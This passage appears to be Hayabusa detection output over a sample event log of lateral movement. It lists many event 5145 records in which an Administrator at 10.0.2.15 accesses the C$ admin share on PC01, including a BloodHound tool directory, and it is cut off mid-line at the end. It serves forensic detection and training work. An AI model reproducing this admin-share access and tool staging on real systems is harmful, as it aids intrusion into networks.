23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 